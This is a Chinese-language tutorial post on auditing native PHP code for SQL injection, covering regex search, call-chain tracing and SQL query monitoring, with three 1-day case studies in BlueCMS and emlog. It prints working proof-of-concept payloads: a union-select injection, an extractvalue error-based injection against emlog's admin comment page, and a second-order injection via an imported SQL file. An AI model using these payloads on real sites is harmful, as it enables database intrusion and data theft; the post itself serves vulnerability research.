代码审计-PHP原生开发篇&SQL注入&数据库监控&正则搜索&文件定位&静态分析

文章目录

前言

挖掘技巧:

-语句监控-数据库SQL监控排查可利用语句定向分析

-功能追踪-功能点文件SQL执行代码函数调用链追踪

-正则搜索-(update|select|insert|delete|).?where.=

如何快速的在多个文件代码里面找脆弱:

1、看文件路径

2、看代码里面的变量(可控)

3、看变量前后的过滤

1、Bluecms-CNVD-1Day-常规注入审计分析

正则搜索关键词-快速定位漏洞点

bash 复制代码
(update|select|insert|delete|).*?where.*=


正则-ad_js.php->getone()->无过滤->有输出payload注入

Poc:

ad_js.php?ad_id=1 union select 1,2,3,4,5,6,database()


2、emlog-CNVD-1Day-常规注入审计分析

功能追踪-功能点文件SQL执行代码函数调用链追踪

审计流程:
comment.php->delCommentByIp($ip)->无过滤->构造触发

Poc:

bash 复制代码
/admin/comment.php?action=delbyip&ip=127.0.0.1%27and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%20--+&token=11f3f9cb7e78e3f88e39ea5678939b7d

3、emlog-CNVD-1Day-2次注入审计分析

语句监控-数据库SQL监控排查可利用语句定向分析

审计流程:

数据库监控->user.php无可控->nickname->添加不可控->data.php可控->导出修改导入->触发二次注入

/admin/data.php

导入文件时执行SQL文件中语句,带入Payload

bash 复制代码
INSERT INTO emlog_user VALUES('110','','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.',(select version()),'writer','n','','123@qq.com ' , '','','0','1687261845','1687261845');
/admin/user.php


select查询nickname条件数据,访问触发二次注入

相关推荐
骑着王八撵玉兔10 分钟前
【性能优化与架构调优(二)】高性能数据库设计与优化
数据库·性能优化·架构
蓝色记忆1 小时前
Composer PSR-4 自动加载机制的完整流程
php
想要入门的程序猿1 小时前
Qt写入excel
数据库·qt·excel
Q_970956392 小时前
java+vue+SpringBoo校园失物招领网站(程序+数据库+报告+部署教程+答辩指导)
java·数据库·vue.js
Wyc724092 小时前
Maven
java·数据库·maven
程序猿小D2 小时前
[附源码+数据库+毕业论文]基于Spring+MyBatis+MySQL+Maven+jsp实现的电影小说网站管理系统,推荐!
java·数据库·mysql·spring·毕业设计·ssm框架·电影小说网站
羊小猪~~2 小时前
数据库学习笔记(十七)--触发器的使用
数据库·人工智能·后端·sql·深度学习·mysql·考研
背太阳的牧羊人3 小时前
Neo4j 的向量搜索(Neo4jVector)和常见的向量数据库(比如 Milvus、Qdrant)之间的区别与联系
数据库·neo4j·milvus
liulun3 小时前
在浏览器中使用SQLite(官方sqlite3.wasm)
数据库·sqlite·wasm
IT项目管理4 小时前
达梦数据库DMHS介绍及安装部署
linux·数据库